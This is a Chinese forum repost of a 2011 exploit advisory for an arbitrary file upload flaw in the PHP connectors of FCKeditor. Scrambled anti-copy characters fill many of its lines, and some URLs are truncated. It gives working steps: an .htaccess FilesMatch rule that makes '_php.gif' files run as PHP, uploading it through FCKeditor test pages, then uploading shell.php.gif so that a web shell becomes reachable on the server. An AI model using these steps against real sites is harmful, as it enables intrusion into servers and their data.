FCKeditor所有php版本Upload上传漏洞
. i/ p6 k9 R6 Y/ p/ {作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
/ J3 I" _7 @1 r; s% P减小字体 增大字体$ ~2 v) P+ a0 l8 e) z. W
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability1 s+ S+ I6 M2 ^
[+] Date: 2011
( i# V8 G3 F% I[+] Author : sinesafe.cn- a, e. V7 {3 q( D+ b
[+] Website : WwW.sinesafe.cn# D. E! C$ J) _2 W5 Z! G
———————————————————
8 B5 o) }. k, m1 v1.create a htaccess file:
' S2 V) Q( o2 ? e) Jcode:4 s5 O$ P; t) I& H, z9 f7 r, R
<FilesMatch “_php.gif”>/ q6 Z' x! a% n, U+ ~
SetHandler application/x-httpd-php
2 m& l, U: \/ w: _</FilesMatch>
5 k: N( Z6 M2 l
, ^9 e$ Y) i! T v- V5 s2.Now upload this htaccess with FCKeditor.
; J3 @ d. T8 }$ G; Y# ~# L! J# O8 N
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html ~: [/ }) c8 t( r4 x# j1 w
+ h u' B: N. k7 } B+ l
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html, I" a1 g# e0 o) w
0 e, H7 @$ d3 o/ c! B
———————————————————————————————-
* {: Z/ I' s8 e0 S3 T3.Now upload shell.php.gif with FCKeditor.6 c; z( O5 ]6 P, O9 c" |
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
3 q2 B. w8 ?& T# ^8 W0 p) p8 `5.http://www.sinesafe.cn/anything/shell_php.gif. C! j1 _* B& {% t
6.Now shell is available from server. |
) _5 J$ h( A! l/ S; Q" g* M
3 f; y$ {. I3 Q
1 P. R) H8 q5 H |
发表于 2013-10-27 17:25:21
收藏
支持
反对